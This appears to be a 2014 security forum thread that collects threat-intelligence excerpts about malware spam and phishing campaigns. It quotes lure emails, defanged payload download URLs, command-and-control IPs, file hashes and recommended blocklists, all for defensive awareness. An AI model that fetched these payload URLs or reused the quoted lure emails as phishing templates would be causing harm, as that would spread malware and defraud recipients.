4 Dec 2014 - "The IP address range of 46.161.30.0/24 (KolosokIvan-net) appears to be dedicated purely to providing phone-home servers for TorrentLocker or some other similar malware. In the past, this IP range has hosted various sites which have moved off... There are no legitimate sites in this network range, so I strongly recommend that you -block- the entire 46.161.30.0/24 range."
(More detail at the dynamoo URL above.)
___
Fake 'Quickbooks intuit unpaid invoice' SPAM - PDF malware
- http://myonlinesecurity.co.uk/quickbooks-intuit-unpaid-invoice-fake-pdf-malware/
4 Dec 2014 - "'Quickbooks intuit unpaid invoice' with a zip attachment pretending to come from Elena.Lin@ intuit .com <Elena.Lin@ quickbooks .com> is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please review the attached invoice and pay this invoice at your earliest convenience. Feel free to contact us if you have any
questions.
Thank you.
4 December 2014 : invoice72.zip: Extracts to: invoice72.scr
Current Virus total detections: 6/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/300feec373535aa4fabfd8a157f1e5afa37af98f6a7d432b50078e16d77480c1/analysis/1417726300/
... Behavioural information
TCP connections
80.248.222.238: https://www.virustotal.com/en/ip-address/184.95.37.110/information/
198.58.84.150: https://www.virustotal.com/en/ip-address/198.58.84.150/information/
UDP communications
198.27.81.168: https://www.virustotal.com/en/ip-address/198.27.81.168/information/
192.95.17.62: https://www.virustotal.com/en/ip-address/192.95.17.62/information/
___
Fake 'FedEx Delivery' confirmation - phishing 419 SCAM
- http://myonlinesecurity.co.uk/fedex-delivery-notification-confirmation-phishing-419-scam/
4 Dec 2014 - "'FedEx Delivery Notification. (Confirmation)' pretending to come from FedEx Courier Delivery <FedExdelivery@ FedEx .com> is a phishing scam. When I first saw these emails start to come in, I thought it was a follow 0n to the current malware spreading campaign Fedex Unable to deliver your item, #00486182 malware but no, it is a pure and simple phishing scam trying to get you to voluntarily give your details. It is most likely a 419 scam which will ask for a fee to expedite the delivery. Just look at all the spelling and grammar mistakes in the email, but of course most victims just don’t read emails closely, just blindly follow instructions and do what is asked without thinking. Email looks like:
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/12/fedex_delivery_phish.jpg
... it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. Or whether it is a straight forward attempt, like this one, to steal your personal, bank, credit card or email and social networking log in details..."
___
Fake Air Canada emails with ticket and flight confirmation leads to malicious ZIP file
- http://blog.mxlab.eu/2014/12/03/new-fake-air-canada-emails-with-ticket-and-flight-confirmation-leads-to-malicious-zip-file/
Dec 3, 2014 - "... intercepted a new trojan distribution campaign by email with the subjects like:
Order #70189189901 successfully – Ticket and flight details
Order #70189101701 paid – E-ticket and flight details
This email is sent from the -spoofed- address “Aircanada .com” <tickets@ aircanada .com>” and has the following body:
Dear client,
Your order has been successfully processed and your credit card charged.
ELECTRONIC TICKET – 70189101701
FLIGHT – QB70189101701CA
DATE / TIME – Dec 4th 2014, 15:30
ARRIVING – Quebec
TOTAL PRICE / 575.00 CAD
Your ticket can be downloaded and printed from the following URL: ...
hxxps ://www.aircanada .com/travelInformation/viewOrderInfo.do?ticket_number=70189101701& view_pdf=yes
For information regarding your order, contact us by visiting our website: ...
Thank you for choosing Air Canada
The embedded URL does -not- point the browser to the real web site address but to hxxp ://ravuol .com/wp-content/plugins/revslider/temp/update_extract/revslider/pdf_ticket_QB70189189901CA.zip. Once this file is extracted you will have the 209 kB large file pdf_ticket_QB70189189901CA.pif. The trojan is known as Trojan.MalPack or a variant of Win32/Injector.BQPL. This trojan has the ability to fingerprint the system, start a server listening on a local machine, create Zeus mutexes, installs itself to autorun, modifies local firewall and policies. At the time of writing, 2 of the 52* AV engines did detect the trojan at Virus Total..."
* https://www.virustotal.com/en/file/8aba09320c5a5844ceb64ef06624eda221578667a1fa59feb3b2c94aabae96fb/analysis/
ravuol .com / 192.232.218.114: https://www.virustotal.com/en/ip-address/192.232.218.114/information/
:mad: :fear:
AplusWebMaster
2014-12-05, 14:49
FYI...
Fake Voicemail SPAM - wav malware
- http://myonlinesecurity.co.uk/stuartclark146-voicemail-message-01438351556night-message-fake-wav-malware/
5 Dec 2014 - "'Voicemail Message (01438351556>Night Message) From:01438351556' pretending to come from stuartclark146@ gmx .com with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
IP Office Voicemail redirected message
5 December 2014: voicemsg.wav.zip : Extracts to: voicemsg.exe
Current Virus total detections: 3/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav ( sound) file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/a8d7a7b4c76fa4456b2aa0fd0107ef500382075a56b93564af037dd322232a9f/analysis/1417779780/
___
Fake Remittance Advice SPAM
- http://blog.dynamoo.com/2014/12/k-j-watking-co-fake-remittance-advice.html
5 Dec 2014 - "... The spam comes with an Excel spreadsheet which contains a malicious macro.
Some sample spams are as follows:
From: Brenton Glover
Date: 5 December 2014 at 07:20
Subject: Remittance Advice for 430.57 GBP
Please find attached a remittance advice for recent BACS payment.
Any queries please contact us.
Brenton Glover
Senior Accounts Payable Specialist
K J Watking & Co
I have seen two versions of these, neither of which are detected as malicious by any vendors [1] [2]. Each spreadsheet contains a different but similar malicious macro... which then download a binary... Recommended blocklist:
194.146.136.1
84.92.26.50
79.137.227.123
124.217.199.218 "
1] https://www.virustotal.com/en/file/84f5c7cca1d8d0d35dbe541a406a8ff188b46624248c60214f00d91faf219d66/analysis/1417773044/
2] https://www.virustotal.com/en/file/a92ed1870f948dfe0b57df27389185157b0d4b28805e06989a40fde0147267b1/analysis/1417773050/
- http://myonlinesecurity.co.uk/k-j-watking-co-remittance-advice-excel-malware/
5 December 2014 : BAC_002163F.xls (253KB) - Current Virus total detections: 0/55*
* https://www.virustotal.com/en/file/66ed083beb750b7c2d65210607f52ff2136dbdb9b9b89dfe88fdbef3c9cf826e/analysis/1417779426/
5 December 2014 : BAC_644385B.xls (290KB) - Current Virus total detections: 0/55**
** https://www.virustotal.com/en/file/a92ed1870f948dfe0b57df27389185157b0d4b28805e06989a40fde0147267b1/analysis/1417779139/
- http://blog.mxlab.eu/2014/12/05/email-remittance-advice-for-245-58-gbp-contains-malicious-xls-file/
Dec 5, 2014
> https://www.virustotal.com/en/file/367b3c188d2dc322c03de0204c66d4c7217a998c879c9ad471ba8e1f8db6a2c4/analysis/1417768835/
___
Fake Order/Invoice SPAM - malicious .doc attachment
- http://blog.dynamoo.com/2014/12/mathew-doleman-lightmoorhomescouk-spam.html
5 Dec 2014 - "This -spam- came through into my mailbox horribly mangled and needed some assembly to make it malicious (everything was in a Base 64 attachment). After some work it appears to have a malicious Word document attached.
From: Mathew Doleman [order@ lightmoorhomes .co .uk]
Date: 5 December 2014 at 08:32
Subject: Order no. 98348936010
Thank you for using our services!
Your order #98348936010 will be shipped on 08-12-2014.
Date: December 04, 2014
Price: 177.69
Payment method: Credit card
Transaction number: OVFTMZERLXVNPXLPXB
Please find the detailed information on your purchase in the attached file (2014-12-4_12-32-28_98348936010.doc)
Best regards,
Sales Department
Mathew Doleman
+07966 566663
The attachment is 2014-12-4_12-32-28_98348936010.doc which looks like an old-style .DOC file, but is actually a newer format .DOCX document, which is poorly detected by AV vendors* ... Some investigation shows that it contains a malicious macro... The macro downloads a file from http ://hiro-wish .com/js/bin.exe which is completely undetected by any AV vendor** at present... The VirusTotal report** shows it phoning home to:
46.4.232.200 (Dmitry Zheltov / Hetzner, Germany)
Recommended blocklist:
203.172.141.250
46.4.232.200
74.208.11.204
hiro-wish .com "
* https://www.virustotal.com/en/file/cbb8823189d908b7f11f4c51da179a0a43a93da4ecff6e83e2db7ab99a444717/analysis/1417776108/
** https://www.virustotal.com/en/file/e167ed90258a88c8f63338a76d5d92feb6f97702fba6c99e9c3300014fcc08b3/analysis/1417775973/
___
Fake 'Package delivery failed' SPAM - PDF malware
- http://myonlinesecurity.co.uk/package-delivery-failed-fake-pdf-malware/
5 Dec 2014 - "'Package delivery failed' pretending to come from Canada Post with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
From: Canada Post [mailto:shipping@ canadapost .ca]
Sent: December 5, 2014 2:31
To: e-Bills – [redacted]
Subject: Package delivery failed
Image removed by sender.
Dear customer,
A delivery attempt has been made on December 3rd, 2014.
The delivery failed because nobody was present at the receiver’s address.
Redelivery can be arranged by visiting our nearest office and presenting a printed copy of the shipping invoice.
TRACKING Number: 3765490000465274
Originating from : RICHMOND
The shipping invoice, necessary for the redelivery arrangements can be automatically downloaded by visiting the tracking section, in our website: ...
5 December 2014: canpost_3765490000465274_trk.zip: Extracts to:
canpost_3765490000465274_trk.pif . Current Virus total detections: 5/55*
... All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/45469fa9aa80014b868ac02fc18997fcad8a25ee7b758cd5358897e126c81929/analysis/1417725574/
___
Halifax phish...
- http://myonlinesecurity.co.uk/halifax-phishing/
5 Dec 2014 - "This Halifax phishing attempt starts with an email saying 'Your Account' pretending to come from Halifax <update@halifax .co .uk> is one of the latest phish attempts to steal your Bank, credit card and personal details. This one only wants your personal details,and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details as well:
1] http://myonlinesecurity.co.uk/wp-content/uploads/2014/12/halifax_phish_email.jpg
...
2] http://myonlinesecurity.co.uk/wp-content/uploads/2014/12/halifax_fake-site.jpg
... the phishers try to validate your details to make sure that you are entering “genuine ” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format..."
:mad: :fear:
AplusWebMaster
2014-12-08, 13:55
FYI...
Fake Invoice SPAM - malicious doc attachment
- http://blog.dynamoo.com/2014/12/soo-sutton-invoice-224245-from-power-ec.html
8 Dec 2014 - "... this -fake- invoice comes with a malicious Word document attached.
From: soo.sutton966@ powercentre .com
Date: 8 December 2014 at 10:57
Subject: INVOICE 224245 from Power EC Ltd
Please find attached INVOICE number 224245 from Power EC Ltd
Attached are one of two Word documents -both- with the name 224245.doc but with slightly different macros. Neither are currently detected by any AV vendors [1] [2]. Inside the DOC is one of two malicious macros... which then downloads an executable from one of the following locations:
http ://aircraftpolish .com/js/bin.exe
http ://gofoto .dk/js/bin.exe
This file is then saves as %TEMP%\CWRSNUYCXKL.exe and currently has zero detections at VirusTotal. The ThreatExpert report shows that it connects to:
203.172.141.250 (Ministry of Education, Thailand)
74.208.11.204 (1&1 Internet, US)
According to the Malwr report this executable drops a DLL with a slightly better detection rate of 5/53*.
Recommended blocklist:
203.172.141.250
74.208.11.204
aircraftpolish .com
gofoto .dk "
1] https://www.virustotal.com/en/file/638c38749b79a38a18d641e3b170e7feeebba21ab3b31ca2d98c5abc5832a150/analysis/1418035603/
2] https://www.virustotal.com/en/file/84d0d1b9544ae8862792796a7ef06e5924919c8ac9fe8b1fb495a4e2df98ed22/analysis/
* https://www.virustotal.com/en/file/8826cc73859b551a7f63db428e13924deeb969b45a7ac8d2cc9b6a4018511c88/analysis/1418037172/
- http://myonlinesecurity.co.uk/please-find-attached-invoice-number-224244-power-ec-ltd-word-doc-malware/
8 Dec 2014
___
Fake 'Transaction confirmation' SPAM - doc malware
- http://myonlinesecurity.co.uk/shipping-status-transaction-confirmation-fake-word-doc-malware/
8 Doc 2014 - "'Shipping status: Transaction confirmation' with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The subjects include (all having random numbers, senders, sales clerks names, telephone numbers, order numbers and amounts. Most pretend to come from sale@ or order@ < random company> )
Shipping status: Transaction confirmation: 77951286043
Order info: 50664959001
Payment info: 22908714125
Payment confirmation: 6322896965
They look like:
Shipping status: Transaction confirmation: 77951286043Greetings,
Your order #77951286043 will be shipped on 16.12.2014.
Date: December 08, 2014. 01:27pm
Price: £163.10
Transaction number: 43595D828F1A5A
Please find the detailed information on your purchase in the attached file order2014-12-08_77951286043.zip
Yours truly,
Sales Department
Keisha Konick ...
-or-
Hello,
Your order #50664959001 will be shipped on 17-12-2014.
Date: December 08, 2014. 01:49pm
Price: £181.71
Transaction number: 1E51D75638EEDA4499
Please find the detailed information on your purchase in the attached file item2014-12-08_50664959001.zip
Kind regards,
Sales Department
Sanjuanita Mandeville ...
Every single attachment received so far today (and there are hundreds) has a different file # so it is difficult to get a viable detection rate at Virus total. The zip attachment extracts to another zip & then to a scr file with an icon looking like it is a word doc.
8 December 2014: order2014-12-08_77951286043.zip: Extracts to: sale2014-12-08_97164185939.scr
Current Virus total detections: 3/55* .
8 December 2014: item2014-12-08_24831482215.zip: Extracts to: item2014-12-08_79359848638.scr
Current Virus total detections: 5/55**
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper word doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/89be5f270a6a3db81b3e0bb84a1bbcfd228d12454eedd7537a5aa38361542f3c/analysis/1418050446/
... Behavioural information
TCP connections
157.56.96.55: https://www.virustotal.com/en/ip-address/157.56.96.55/information/
213.186.33.19: https://www.virustotal.com/en/ip-address/213.186.33.19/information/
95.101.0.96: https://www.virustotal.com/en/ip-address/95.101.0.96/information/
195.60.214.11: https://www.virustotal.com/en/ip-address/195.60.214.11/information/
217.16.10.3: https://www.virustotal.com/en/ip-address/217.16.10.3/information/
74.208.11.204: https://www.virustotal.com/en/ip-address/74.208.11.204/information/
** https://www.virustotal.com/en/file/8c968020120ca70d9d56102d3576d0d9e562a57413b7d437d9b4019a8a96b02f/analysis/1418050480/
... Behavioural information
TCP connections
191.232.80.55: https://www.virustotal.com/en/ip-address/191.232.80.55/information/
213.186.33.19: https://www.virustotal.com/en/ip-address/213.186.33.19/information/
95.101.0.90: https://www.virustotal.com/en/ip-address/195.60.214.11/information/
195.60.214.11: https://www.virustotal.com/en/ip-address/195.60.214.11/information/
217.16.10.3: https://www.virustotal.com/en/ip-address/217.16.10.3/information/
74.208.11.204: https://www.virustotal.com/en/ip-address/74.208.11.204/information/
___
Fake HSBC Advising SPAM - leads to malware
- http://blog.mxlab.eu/2014/12/08/fake-email-from-hsbc-advising-service-leads-to-malware/
Dec 8, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Payment Advice – Advice Ref:[GB659898] / CHAPS credits” (number in subject will vary). This email is sent from the spoofed address “HSBC Advising Service <advising.service@ hsbc .com>” and has the following body:
Sir/Madam,
Please download document from dropbox, payment advice is issued at the request of our customer. The advice is or your reference only.
Download link: ...
Yours faithfully,
Global Payments and Cash Management
HSBC ...
In this sample, the embedded URl directs us to hxxp ://paparellalogistica .it/banking/document.php where the file documentXXX.zip (name contains number that will vary) is downloaded.The trojan is known as Upatre-FAAJ!BADD639EC640, HB_Arkam or Virus.Win32.Heur.c. The trojan will create a new service gtpwz.exe on the system, modify some Windows registry and can connect to the IP 62.210.204.149 on port 33294 and 33321 for outbound traffic. At the time of writing, 5 of the 53* AV engines did detect the trojan at Virus Total..."
* https://www.virustotal.com/en/file/2ed5903942b5299ea69183aa040343338d220b66742c510c0895766fe0b70b9a/analysis/
... Behavioural information
TCP connections
62.210.204.149: https://www.virustotal.com/en/ip-address/62.210.204.149/information/
188.132.235.180: https://www.virustotal.com/en/ip-address/188.132.235.180/information/
UDP communications
208.97.25.20: https://www.virustotal.com/en/ip-address/208.97.25.20/information/
208.97.25.6: https://www.virustotal.com/en/ip-address/208.97.25.6/information/
:fear: :mad:
AplusWebMaster
2014-12-09, 13:29
FYI...
Something evil on 5.196.33.8/29
- http://blog.dynamoo.com/2014/12/something-evil-on-519633829.html
9 Dec 2014 - "This Tweet* from @Kafeine about the Angler EK drew my attention to a small block of OVH UK addresses of 5.196.33.8/29 which appear to be completely dedicated to distributing malware.
Specifically, VirusTotal lists badness on the following IPs:
5.196.33.8: https://www.virustotal.com/en/ip-address/5.196.33.8/information/
5.196.33.9: https://www.virustotal.com/en/ip-address/5.196.33.9/information/
5.196.33.10: https://www.virustotal.com/en/ip-address/5.196.33.10/information/
There are also some doubtful looking IP addresses on 5.196.33.15** which may we have a malicious purpose... suggest that you treat them as malicious.
Recommended blocklist:
5.196.33.8/29 ..."
(Long list at the dynamoo URL at the top of this post.)
* https://twitter.com/kafeine/status/541550193649680385
** https://www.virustotal.com/en/ip-address/5.196.33.15/information/
___
Fake 'UPS Customer Service' SPAM - PDF malware
- http://myonlinesecurity.co.uk/ups-customer-service-fake-pdf-malware/
9 Dec 2014 - "'UPS Customer Service' pretending to come from UPS Customer Service [mailto:upsdi@ ups .com] is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
From: UPS Customer Service [mailto:upsdi@ ups .com]
Sent: December 9, 2014 11:25
To: [redacted]
Subject: [SPAM] UPS Customer Service
IMPORTANT DELIVERY
Dear [redacted]
You have received an important delivery from UPS Customer Service.
Please pick up the ePackage at the following Web address:
The ePackage will expire on Thursday December 11, 2014, 00:00:00 EDT
…………………………………………………………….
HOW TO PICK UP YOUR ePackage
* If the Web address above is highlighted, click on it to open a browser window. You will automatically be taken to the ePackage.
* If the Web address above is not highlighted, then follow these steps:
– Open a web browser window.
– Copy and paste the entire Web address into the ‘location’ or ‘address’ bar of the browser.
– Press enter.
Once you arrive at the ePackage web page, you can access the attached files and/or private message.
…………………………………………………………….
If you require assistance please contact UPS Customer Service.
Please note: This e-mail was sent from an auto-notification system that cannot accept incoming e-mail. Please do not reply to this message.
This e-mail is intended for the addressee shown. It contains information that is confidential and protected from disclosure. Any review,
dissemination or use of this transmission or its contents by persons or unauthorized employees of the intended organizations is strictly prohibited.
__________________________________
Delivered by UPS ePackage
9 December 2014: ePackage_12092014_42.pdf.zip: Extracts to: ePackage_12092014_42.pdf.scr
Current Virus total detections: 0/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/8be655497ded041cc896788e543e5dad24a5dea518f9d869e376948b004c2e71/analysis/1418149697/
... Behavioural information
TCP connections
54.225.211.214: https://www.virustotal.com/en/ip-address/54.225.211.214/information/
194.150.168.70: https://www.virustotal.com/en/ip-address/194.150.168.70/information/
___
Phishing SCAM - 'Your Email Address Transmitting Viruses'
- http://www.hoax-slayer.com/email-address-transmitting-viruses-phishing.shtml
Dec 9, 2014 - "... The email is -not- from any email administrator or service provider. It is a phishing scam designed to steal your account login details via a fake login form. If you click the link and login on the -fake- site, your email account may be hijacked by criminals and used for spam and scam campaigns... Example:
Subject: Take note [email address removed]: Your email address will be terminated now
Dear [email address removed]
Your email address (removed) has been transmitting viruses to our servers and will be deactivated permanently if not resolved.
You are urgently required to sanitize your email or your access to email services will be terminated
Click here now to scan and sanitize your e-mail account
Note that failure to sanitize your email account immediately will lead to permanent deactivation without warning.
We are very sorry for the inconveniences this might have caused you and we assure you that everything will return to normal as soon as you have done the needful.
Admin
According to this email, which claims - rather vaguely - to be from 'Admin', your email has been transmitting viruses to the sender's servers. The email warns that your account will be deactivated permanently if you do not resolve the issue. The message instructs you to 'urgently' click a link to run a scan and 'sanitize your e-mail account'... Clicking the link takes you to a fraudulent webpage that includes a stolen Norton Antivirus logo and a login box (See screenshot below*). The page instructs you to login with your email address and password to run a 30 second scan. After 'logging in', a 'Please wait - scanning' message will be displayed for a few seconds. Finally, a 'Scan Complete' message will be shown. At this point, you may believe that the viruses have been removed and you have successfully resolved the issue... however, the criminals behind the scam can collect your login details and hijack your real email account. They may use the hijacked account to launch further spam and scam campaigns in your name..."
* http://www.hoax-slayer.com/images/email-address-tansmitting-viruses.jpg
:mad: :fear:
AplusWebMaster
2014-12-10, 13:52
FYI...
Fake 'Remittance Advice' SPAM - malicious attachment
- http://blog.dynamoo.com/2014/12/spam-remittance-advice-from-anglia.html
10 Dec 2014 - "This spam email does not come from Anglia Engineering Solutions Ltd but instead comes from a criminally-operated botnet and has a malicious attachment.
From: Serena Dotson
Date: 10 December 2014 at 10:33
Subject: Remittance Advice from Anglia Engineering Solutions Ltd [ID 334563N]
Dear ,
We are making a payment to you.
Please find attached a copy of our remittance advice, which will reach your bank account on 11/12/2014.
If you have any questions regarding the remittance please contact us using the details below.
Kind regards
Serena Dotson
Anglia Engineering Solutions Ltd ...
The sender's name, ID number and attachment name vary from spam email to spam email. It comes with one of two Excel attachments, both of which are malicious but are undetected by any AV product [1] [2] which contains one of two malicious macros... which attempts to download an executable from the following locations:
http ://217.174.240.46:8080/stat/lld.php
http ://187.33.2.211:8080/stat/lld.php
This file is downloaded as test.exe and is then copied to %TEMP%\LNUDTUFLKOJ.exe. This executable has a VirusTotal detection rate of just 1/55*. The ThreatTrack report... shows attempted connections to the following IPs:
194.146.136.1 (PE "Filipets Igor Victorovych", Ukraine)
84.92.26.50 (PlusNet, UK)
87.106.246.201 (1&1, Germany)
Traffic to 194.146.136.1 is also confirmed by VirusTotal. The Malwr report shows the same traffic. The payload is most likely Dridex, a banking trojan. I recommend that you block traffic to the following IPs:
194.146.136.1
84.92.26.50
87.106.246.201
217.174.240.46
187.33.2.211 "
1] https://www.virustotal.com/en/file/5df525cbd9ab794673e6ce705f3706077704837e115d67788e673b18a303b578/analysis/1418208470/
2] https://www.virustotal.com/en/file/1e0f0179fd559c96b5aa9b135a32a6527bdf81694f8b27599e5fb6d3c660ad94/analysis/1418208468/
* https://www.virustotal.com/en/file/c92200fd311abe6f1e8422781f3eefec7ef2791ab0f43e4552bd27488091da94/analysis/1418208856/
- http://myonlinesecurity.co.uk/remittance-advice-anglia-engineering-solutions-ltd-excel-xls-malware/
10 Dec 2014
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/12/Anglia-Engineering-Solutions.jpg
* https://www.virustotal.com/en/file/1e0f0179fd559c96b5aa9b135a32a6527bdf81694f8b27599e5fb6d3c660ad94/analysis/1418209362/
** https://www.virustotal.com/en/file/5df525cbd9ab794673e6ce705f3706077704837e115d67788e673b18a303b578/analysis/1418209779/
___
Fake JPMorgan Chase – ACH – Bank account info SPAM – PDF malware
- http://myonlinesecurity.co.uk/gre-project-accounting-jpmorgan-chase-ach-bank-account-information-form-fake-pdf-malware/
10 Dec 2014 - "'ACH – Bank account information form' pretending to come from random names at jpmchase.com with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please fill out and return the attached ACH form along with a copy of a voided check.
Jules Hebert,
JPMorgan Chase
GRE Project Accounting
Vendor Management & Bid/Supervisor
Fax-602-221-2251
Jules.Hebert@ jpmchase .com
GRE Project Accounting
10 December 2014: Check_Copy_Void.zip: Extracts to: Check_Copy_Void.scr
Current Virus total detections: 5/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/37ca2089e469332ff3400712726cdb85f4e07ef84d245e9d68b9ed1276dac0d7/analysis/1418238116/
... Behavioural information
TCP connections
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
213.175.194.96: https://www.virustotal.com/en/ip-address/213.175.194.96/information/
UDP communications
107.23.150.92: https://www.virustotal.com/en/ip-address/107.23.150.92/information/
___
Fake 'PRODUCT ENQUIRY' SPAM - jpg malware
- http://myonlinesecurity.co.uk/re-product-enquiry-fake-jpg-malware/
10 Dec 2014 - "'RE: PRODUCT ENQUIRY' coming from a random company with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Hello,
We are very interested in your product line. We got your profile from sister-companies. Can you please email me the list of all your Class A products and their prices? How much is the minimum order for shipping? What is the mode of payment and can you ship to Stockholm (SWEDEN)?
Please refer to the attached photo in my email. I was informed that this was purchased from your company. I would also like to order this product. Can you send the product code in your reply.
Thank you very much
Stven Clark
Lindhagensgatan 90,
112 18 Stockholm,
SWEDEN…
10 December 2014: Product Image NO. 1_jpeg…………….. (1).7z:
Extracts to: Product Image NO. GXD46474848494DHW_jpeg…………….. (1).exe
Current Virus total detections: 2/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper jpg file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/d723f44d1d2943966f9ad4e5529af1816bfb51f261e68304241255a68f8c15d7/analysis/1418220978/
___
85% of website scams - China
- http://www.theregister.co.uk/2014/12/10/chinese_responsible_for_85_per_cent_of_website_scams/
10 Dec 2014 - "Chinese internet users are behind 85 per cent of -fake- websites, according to a semi-annual report [PDF*] from the Anti-Phishing Working Group (APWG). Of the 22,679 -malicious- domain registrations that the group reviewed, over 19,000 were registered to servers based in China. This is in addition to nearly 60,000 websites that were hacked in the first half of 2014 and then used to acquire people's details and credit card information while pretending to offer real goods or services. Chinese registrars were also the worst offenders, with nine of the top ten companies with the highest percentages of phished domains based in China. Dot-com domains are the most popular for phishing sites, being used in 51 per cent of cases, but when it comes down to the percentage of phished domains against the number of domains under that registry, the clear winner is the Central African Republic's dot-cf, with more than 1,200 phished domain out of a total of 40,000 (followed by Mali's dot-ml, Palau's dot-pw and Gabon's dot-ga). Despite concerted efforts to crack down on fake websites, little improvement was made on the last report in terms of uptime (although it is significantly lower than when the group first started its work back in 2010). The average uptime of a phishing site was 32 hours, whereas the median was just under 9 hours. As for the phishers' targets: Apple headed the list for the first time being used in 18 per cent of all attacks, beating out perennial favorite PayPal with just 14 per cent. Despite some fears, the introduction of hundreds of new generic top-level domains has not led to a noticeable increase in phishing, according to the report. The authors posit that this may because of the higher average price of new gTLDs, although they expect the new of new gTLD phished domains to increase as adoption grows and websites are compromised. Around 20 per cent of phishing attacks are achieved through hacking of vulnerable shared hosting providers..."
* http://docs.apwg.org/reports/APWG_Global_Phishing_Report_1H_2014.pdf
___
Zeus malware thru browser warning: social engineering...
- http://blog.phishlabs.com/zeus-malware-distributed-through-browser-warning-social-engineering-at-its-finest
Dec 5, '14 - "Zeus malware continues to plague the Internet with distributions through spam emails and embeds in compromised corners of the web – all designed to exploit unsuspecting consumers. PhishLabs’ R.A.I.D. (Research Analysis and Intelligence Division) recently observed the Zeus malware being distributed through an alarmingly convincing browser warning that prompts viewers to download and “restore settings”... designed to manipulate viewers so that they believe the alert is based on security preferences that he or she has previously set up. The message creates a sense of urgency and fear, warning of “unusual activity”... Generally speaking, grammar and spelling are often indicators of fake or malicious requests that lead to malware but cybercriminals have caught on to this vulnerability and stepped up their game. Although it is not perfect, the warning observed in this case was much more accurate than what we usually see. The warning states:
"REPORTED BROWSER ONLINE DOCUMENT FILE READER WARNING”. We have detected unusual activities on your browser and the Current Online Document File Reader has been blocked base on your security preferences. It is recommended that you update to the latest version available in order to restore your settings and view Documents."
Browser warning leading to Zeus malware download:
> http://info.phishlabs.com/hs-fs/hub/326665/file-2183047529-png/blog-files/Zeus_Browser_Warning.png
The fake browser warning requires the user to click the "Download and Install" button. Once clicked, the victim is redirected to a site that downloads the Zeus executable (Zbot) malware. The R.A.I.D was able to track the malware back to the Zeus control panel...
Zeus (Zbot) malware control panel:
> http://info.phishlabs.com/hs-fs/hub/326665/file-2184127607-png/blog-files/Zeus_Control_Panel..png
Web users should be on the lookout for this kind of social engineering that capitalizes on fear and misleads users to believe the alert is showing up based on user-defined preferences. Zeus is a dangerous malware that continues to be distributed through sophisticated avenues. In the past, Zeus infections have led to exploitation of machines, making them part of a -botnet-, as well as bank account takeovers and fraud."
:fear::fear: :mad:
AplusWebMaster
2014-12-11, 13:19
FYI...
Fake Invoice 'UK Fuels E-bill' SPAM - malicious doc attachment
- http://blog.dynamoo.com/2014/12/uk-fuels-e-bill-ebillinvoicecom-spam.html
11 Dec 2014 - "This -fake- invoice comes with a malicious attachment:
From: invoices@ ebillinvoice .com
Date: 11 December 2014 at 08:06
Subject: UK Fuels E-bill
Customer No : 35056
Email address : [redacted]
Attached file name : 35056_49_2014.doc
Dear Customer
Please find attached your invoice for Week 49 2014.
In order to open the attached DOC file you will need
the software Microsoft Office Word.
If you have any queries regarding your e-bill you can contact us at invoices@ ebillinvoice .com.
Yours sincerely
Customer Services
UK Fuels Ltd ...
This spam is not from UK Fuels Ltd or ebillinvoice .com and is a forgery. Attached is a malicious Word document which in the sample I have seen is undetected by AV vendors*. This downloads a file from the following location:
http ://KAFILATRAVEL .COM/js/bin.exe
